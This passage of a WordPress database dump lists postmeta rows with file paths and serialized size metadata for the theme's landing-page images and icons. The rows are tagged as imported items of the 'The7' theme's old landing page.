(3004,983,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:780;s:6:\"height\";i:487;s:4:\"file\";s:43:\"2016/11/art-landing-addons-and-composer.jpg\";s:8:\"filesize\";i:96271;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:43:\"art-landing-addons-and-composer-300x187.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10419;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:43:\"art-landing-addons-and-composer-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6619;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:43:\"art-landing-addons-and-composer-768x480.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40942;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3005,983,'_the7_imported_item','old-landing'),
(3006,984,'_wp_attached_file','2016/11/art-landing-wizard.jpg'),
(3007,984,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:780;s:6:\"height\";i:570;s:4:\"file\";s:30:\"2016/11/art-landing-wizard.jpg\";s:8:\"filesize\";i:120537;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"art-landing-wizard-300x219.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:219;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12782;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"art-landing-wizard-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6569;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:30:\"art-landing-wizard-768x561.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:561;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51579;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3008,984,'_the7_imported_item','old-landing'),
(3009,986,'_wp_attached_file','2016/11/art-landing-main-demo-tiny.png'),
(3010,986,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:780;s:6:\"height\";i:557;s:4:\"file\";s:38:\"2016/11/art-landing-main-demo-tiny.png\";s:8:\"filesize\";i:94633;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"art-landing-main-demo-tiny-300x214.png\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:87806;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"art-landing-main-demo-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:38584;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"art-landing-main-demo-tiny-768x548.png\";s:5:\"width\";i:768;s:6:\"height\";i:548;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:486558;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3011,986,'_the7_imported_item','old-landing'),
(3012,987,'_wp_attached_file','2016/11/art-landing-steps-wizard-tiny.png'),
(3013,987,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:489;s:6:\"height\";i:85;s:4:\"file\";s:41:\"2016/11/art-landing-steps-wizard-tiny.png\";s:8:\"filesize\";i:4215;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"art-landing-steps-wizard-tiny-300x52.png\";s:5:\"width\";i:300;s:6:\"height\";i:52;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13884;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"art-landing-steps-wizard-tiny-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3110;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3014,987,'_the7_imported_item','old-landing'),
(3015,988,'_wp_attached_file','2016/11/art-landing-theme-options-tiny.png'),
(3016,988,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:780;s:6:\"height\";i:474;s:4:\"file\";s:42:\"2016/11/art-landing-theme-options-tiny.png\";s:8:\"filesize\";i:38259;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:42:\"art-landing-theme-options-tiny-300x182.png\";s:5:\"width\";i:300;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41909;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:42:\"art-landing-theme-options-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23707;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:42:\"art-landing-theme-options-tiny-768x467.png\";s:5:\"width\";i:768;s:6:\"height\";i:467;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:236050;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3017,988,'_the7_imported_item','old-landing'),
(3018,990,'_wp_attached_file','2016/11/elements-art-tiny.png'),
(3019,990,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:29:\"2016/11/elements-art-tiny.png\";s:8:\"filesize\";i:18645;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"elements-art-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:30469;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3020,990,'_the7_imported_item','old-landing'),
(3021,991,'_wp_attached_file','2016/11/headers-art-tiny.png'),
(3022,991,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:28:\"2016/11/headers-art-tiny.png\";s:8:\"filesize\";i:2635;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"headers-art-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9045;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3023,991,'_the7_imported_item','old-landing'),
(3024,992,'_wp_attached_file','2016/11/plugins-art-tiny.png'),
(3025,992,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:28:\"2016/11/plugins-art-tiny.png\";s:8:\"filesize\";i:9867;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"plugins-art-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23132;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3026,992,'_the7_imported_item','old-landing'),
(3027,993,'_wp_attached_file','2016/11/rating-art-tiny.png'),
(3028,993,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:202;s:6:\"height\";i:200;s:4:\"file\";s:27:\"2016/11/rating-art-tiny.png\";s:8:\"filesize\";i:4505;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"rating-art-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10020;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3029,993,'_the7_imported_item','old-landing'),
(3030,994,'_wp_attached_file','2016/11/seo-art-tiny.png'),
(3031,994,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:24:\"2016/11/seo-art-tiny.png\";s:8:\"filesize\";i:11018;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"seo-art-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:20431;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3032,994,'_the7_imported_item','old-landing'),
(3033,995,'_wp_attached_file','2016/11/support-art-tiny.png'),
(3034,995,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:28:\"2016/11/support-art-tiny.png\";s:8:\"filesize\";i:15425;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"support-art-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23177;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3035,995,'_the7_imported_item','old-landing'),
(3036,996,'_wp_attached_file','2016/11/translation-art-tiny.png'),
(3037,996,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:32:\"2016/11/translation-art-tiny.png\";s:8:\"filesize\";i:10721;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:32:\"translation-art-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19453;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3038,996,'_the7_imported_item','old-landing'),
(3039,997,'_wp_attached_file','2016/11/updates-art-tiny.png'),
(3040,997,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:28:\"2016/11/updates-art-tiny.png\";s:8:\"filesize\";i:13834;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"updates-art-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:27873;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3041,997,'_the7_imported_item','old-landing'),
(3042,998,'_wp_attached_file','2016/11/woo-art-tiny.png'),
(3043,998,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:24:\"2016/11/woo-art-tiny.png\";s:8:\"filesize\";i:15274;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"woo-art-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29811;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3044,998,'_the7_imported_item','old-landing'),
(3045,1000,'_wp_attached_file','2016/11/logo-floating-hd.png'),
(3046,1000,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:88;s:6:\"height\";i:88;s:4:\"file\";s:28:\"2016/11/logo-floating-hd.png\";s:8:\"filesize\";i:3678;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3047,1000,'_the7_imported_item','old-landing'),
(3048,1001,'_wp_attached_file','2016/11/logo-floating.png'),
(3049,1001,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:44;s:6:\"height\";i:44;s:4:\"file\";s:25:\"2016/11/logo-floating.png\";s:8:\"filesize\";i:1779;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3050,1001,'_the7_imported_item','old-landing'),
(3051,1002,'_wp_attached_file','2016/11/i-options-tiny.png'),
(3052,1002,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:74;s:6:\"height\";i:67;s:4:\"file\";s:26:\"2016/11/i-options-tiny.png\";s:8:\"filesize\";i:2646;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3053,1002,'_the7_imported_item','old-landing'),
(3054,1003,'_wp_attached_file','2016/11/i-testimonials-tiny.png'),
(3055,1003,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:70;s:6:\"height\";i:64;s:4:\"file\";s:31:\"2016/11/i-testimonials-tiny.png\";s:8:\"filesize\";i:903;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3056,1003,'_the7_imported_item','old-landing'),
(3057,1004,'_wp_attached_file','2016/11/i-wizard-tiny.png'),
(3058,1004,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:67;s:6:\"height\";i:70;s:4:\"file\";s:25:\"2016/11/i-wizard-tiny.png\";s:8:\"filesize\";i:2457;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3059,1004,'_the7_imported_item','old-landing'),
(3060,1005,'_wp_attached_file','2016/11/ic-demos-tiny.png'),
(3061,1005,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:90;s:6:\"height\";i:65;s:4:\"file\";s:25:\"2016/11/ic-demos-tiny.png\";s:8:\"filesize\";i:822;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3062,1005,'_the7_imported_item','old-landing'),
(3063,1006,'_wp_attached_file','2016/11/ic-features-tiny.png'),
(3064,1006,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:75;s:6:\"height\";i:62;s:4:\"file\";s:28:\"2016/11/ic-features-tiny.png\";s:8:\"filesize\";i:2429;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3065,1006,'_the7_imported_item','old-landing'),
(3066,1007,'_wp_attached_file','2016/11/ic-integration-tiny.png'),
(3067,1007,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:64;s:6:\"height\";i:64;s:4:\"file\";s:31:\"2016/11/ic-integration-tiny.png\";s:8:\"filesize\";i:1492;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3068,1007,'_the7_imported_item','old-landing'),
(3069,1008,'_wp_attached_file','2016/11/ic-seven-demo-tiny.png'),
(3070,1008,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:69;s:6:\"height\";i:62;s:4:\"file\";s:30:\"2016/11/ic-seven-demo-tiny.png\";s:8:\"filesize\";i:1072;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3071,1008,'_the7_imported_item','old-landing'),
(3072,1010,'_wp_attached_file','2016/11/comment-icon-tiny.png'),
(3073,1010,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:39;s:6:\"height\";i:30;s:4:\"file\";s:29:\"2016/11/comment-icon-tiny.png\";s:8:\"filesize\";i:365;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3074,1010,'_the7_imported_item','old-landing'),
(3075,1011,'_wp_attached_file','2016/11/stars-rating-icon-tiny.png'),
(3076,1011,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:88;s:6:\"height\";i:15;s:4:\"file\";s:34:\"2016/11/stars-rating-icon-tiny.png\";s:8:\"filesize\";i:719;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3077,1011,'_the7_imported_item','old-landing'),
(3078,1032,'_wp_attached_file','2016/11/the7-ipad-hd1.gif'),
(3079,1032,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:152;s:6:\"height\";i:152;s:4:\"file\";s:25:\"2016/11/the7-ipad-hd1.gif\";s:8:\"filesize\";i:4370;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"the7-ipad-hd1-150x150.gif\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:5932;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3080,1032,'_the7_imported_item','old-landing'),
(3081,1033,'_wp_attached_file','2016/11/the7-iphone-hd1.gif'),
(3082,1033,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:120;s:6:\"height\";i:120;s:4:\"file\";s:27:\"2016/11/the7-iphone-hd1.gif\";s:8:\"filesize\";i:3576;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3083,1033,'_the7_imported_item','old-landing'),
(3084,1034,'_wp_attached_file','2016/11/the7-new-fav-hd1.gif'),
(3085,1034,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:32;s:6:\"height\";i:32;s:4:\"file\";s:28:\"2016/11/the7-new-fav-hd1.gif\";s:8:\"filesize\";i:1521;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3086,1034,'_the7_imported_item','old-landing'),
(3087,1035,'_wp_attached_file','2016/11/the7-new-fav1.gif'),
